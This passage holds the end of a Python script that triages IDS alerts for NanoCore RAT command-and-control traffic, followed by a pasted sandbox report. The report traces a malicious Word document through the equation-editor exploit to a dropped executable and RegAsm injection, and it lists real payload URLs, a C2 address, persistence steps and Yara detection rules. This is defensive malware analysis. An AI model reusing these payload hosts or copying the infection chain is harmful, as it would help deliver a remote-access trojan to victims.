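    r"(?P<src>[\d.]+):(?P<sport>\d+)\s+->\s+(?P<dst>[\d.]+):(?P<dport>\d+)$")

ALERTS = [
    "2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49171 -> 194.5.98.202:4488",
    "2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49172 -> 194.5.98.202:4488",
    "2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49173 -> 194.5.98.202:4488",
    "2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49174 -> 194.5.98.202:4488",
    "2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.22:49175 -> 194.5.98.202:4488",
]

DNS_ANSWERS = {"bit.ly": {"67.199.248.10"}}  # constructed, see module docstring

CONNECTIONS = [  # (source port, destination IP, destination port) from the report
    (49165, "67.199.248.10", 80),
    (49171, "194.5.98.202", 4488),
    (49172, "194.5.98.202", 4488),
    (49173, "194.5.98.202", 4488),
    (49174, "194.5.98.202", 4488),
    (49175, "194.5.98.202", 4488),
]

# Assumed baseline of ports that do not by themselves warrant a look.
STANDARD_PORTS = {25, 53, 80, 443, 587, 993, 995, 8080}


def parse_snort(line):
    """Split a report-style alert line into its fields; None if it does not match."""
    m = SNORT_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    for k in ("sid", "size", "sport", "dport"):
        d[k] = int(d[k])
    return d


def unresolved_destinations(dns_answers, connections):
    """Destination IPs no DNS answer ever returned: hard-coded C2 candidates."""
    resolved = set().union(*dns_answers.values()) if dns_answers else set()
    return {dst for _, dst, _ in connections if dst not in resolved}


def summarize(dns_answers, connections, alert_lines):
    """Per destination IP: ports, connection count, resolving name, IDS sids."""
    ip_to_name = {ip: name for name, ips in dns_answers.items() for ip in ips}
    out = defaultdict(lambda: {"ports": set(), "connections": 0,
                               "resolved_as": None, "sids": set(),
                               "non_standard_port": False})
    for _, dst, dport in connections:
        e = out[dst]
        e["ports"].add(dport)
        e["connections"] += 1
        e["resolved_as"] = ip_to_name.get(dst)
        e["non_standard_port"] |= dport not in STANDARD_PORTS
    for line in alert_lines:
        a = parse_snort(line)
        if a:
            out[a["dst"]]["sids"].add(a["sid"])
    return dict(out)


def c2_candidates(summary):
    """IPs never resolved via DNS, on a non-standard port, or named in an alert."""
    return sorted(ip for ip, e in summary.items()
                  if e["resolved_as"] is None or e["non_standard_port"] or e["sids"])


if __name__ == "__main__":
    s = summarize(DNS_ANSWERS, CONNECTIONS, ALERTS)
    for ip in c2_candidates(s):
        print(ip, s[ip])
```

Note that the "no DNS answer" test needs the DNS responses, not just the queries; this report only shows the query names, which is why the answer here is constructed. The same check also fires on hosts that are addressed by IP legitimately (update servers, CDNs pinned by IP), so it is a triage signal to combine with the port and IDS evidence, as c2_candidates does, rather than a standalone verdict.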
Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007B2E3E WSARecv,
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24864F90-30CA-4646-ACFF-79FC9E14ADCB}.tmp
Source: global traffic | HTTP traffic detected: GET /2ZKf4aq HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) | Host: bit.ly | Connection: Keep-Alive
Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp | String found in binary or memory: /moc.nideknil.wwwwww.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp | String found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: bit.ly
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.2.dr | String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: 77EC63BDA74BD0D0E0426DC8F8008506.2.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.digicert.com0:
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: RegAsm.exe, 00000006.00000002.2371916923.000000000083D000.00000004.00000020.sdmp | String found in binary or memory: http://ocsp.msocsp.com0
Source: RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: RegAsm.exe, 00000006.00000002.2372610828.0000000002790000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371587310.0000000001BE0000.00000002.00000001.sdmp, RegAsm.exe, 0000000F.00000002.2323283664.0000000002500000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
      Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpString found in binary or memory: https://ibkebw.dm.files.1drv.com/
      Source: RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmpString found in binary or memory: https://ibkebw.dm.files.1drv.com/y
      Source: RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmp, RegAsm.exe, 00000006.00000002.2382485610.000000001DC80000.00000004.00000001.sdmpString found in binary or memory: https://ibkebw.dm.files.1drv.com/y4mkt1ePYl5p-A97ciot0bQ59hcBfLkczVR077g5LVTnsSoRxe1bs39ErOjDRD_qmHQ
      Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/
      Source: RegAsm.exe, 00000006.00000002.2371947778.000000000085A000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/E
      Source: RegAsm.exe, RegAsm.exe, 00000006.00000002.2371992276.000000000089A000.00000004.00000020.sdmpString found in binary or memory: https://onedrive.live.com/download?cid=802AC8A73EEC8C8E&resid=802AC8A73EEC8C8E%21110&authkey=AK1w6-P
      Source: RegAsm.exe, 00000006.00000002.2372026516.00000000008CC000.00000004.00000020.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
      Source: 2ZKf4aq[1].htm.2.drString found in binary or memory: https://u.teknik.io/wREzo.txt
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
      Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
      Source: RegAsm.exe, 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmpBinary or memory string: RegisterRawInputDevices

      E-Banking Fraud:

      Yara detected Nanocore RAT
      Source: Yara match | File source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: Yara match | File source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
      Source: Yara match | File source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A

      System Summary:

      Malicious sample detected (through community Yara rule)
      Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
      Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
      Office equation editor drops PE file
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\69577.exe
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt
      Source: C:\Users\Public\69577.exe | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\Public\69577.exe | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Users\user\subfolder1\filename1.exe | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Users\user\subfolder1\filename1.exe | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Memory allocated: 76E20000 page execute and read and write
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Memory allocated: 76D20000 page execute and read and write
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00287311 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_0028725D NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_002872B9 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00287322 NtProtectVirtualMemory,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007B180A NtQuerySystemInformation,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007B17CF NtQuerySystemInformation,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00792418
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00799C03
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00798CF0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007998F0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007938C8
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_0079B5C0
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_00793020
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007930E7
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007999B7
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_1E370FF6
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 15_2_006B01B7
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Code function: 17_2_003A01B7
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Code function: 20_2_002701B7
      Source: filename1.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: filename1.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: filename1.exe.6.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY | Matched rule: NanoCore date = 2014/04, filetype = exe, author = Kevin Breen <kevin@techanarchy.net>, maltype = Remote Access Trojan, ref = http://malwareconfig.com/stats/NanoCore
      Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.130000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1e3c125c.9.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Gen_2 date = 2016-04-22, hash1 = 755f49a4ffef5b1b62f4b5a5de279868c0c1766b528648febf76628f1fe39050, author = Florian Roth, description = Detetcs the Nanocore RAT, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://www.sentinelone.com/blogs/teaching-an-old-rat-new-tricks/
      Source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE | Matched rule: Nanocore_RAT_Feb18_1 date = 2018-02-19, hash1 = aa486173e9d594729dbb5626748ce10a75ee966481b68c1b4f6323c827d9658c, author = Florian Roth, description = Detects Nanocore RAT, reference = Internal Research - T2T, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@19/25@6/3
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007B149A AdjustTokenPrivileges,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Code function: 6_2_007B1463 AdjustTokenPrivileges,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | File created: C:\Program Files (x86)\SMTP Service
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$OTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Mutant created: \Sessions\1\BaseNamedObjects\Global\{92421eeb-c456-44c2-ab8d-5a66d7e5ab97}
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRB2DA.tmp
      Source: C:\Windows\SysWOW64\schtasks.exe | Console Write: ................0.......................(.P.....................@.......8.................................................................).....
      Source: C:\Windows\SysWOW64\schtasks.exe | Console Write: ................`."...............".....(.P.............<.......................................................................................
      Source: C:\Users\Public\69577.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\subfolder1\filename1.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe | Section loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
      Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
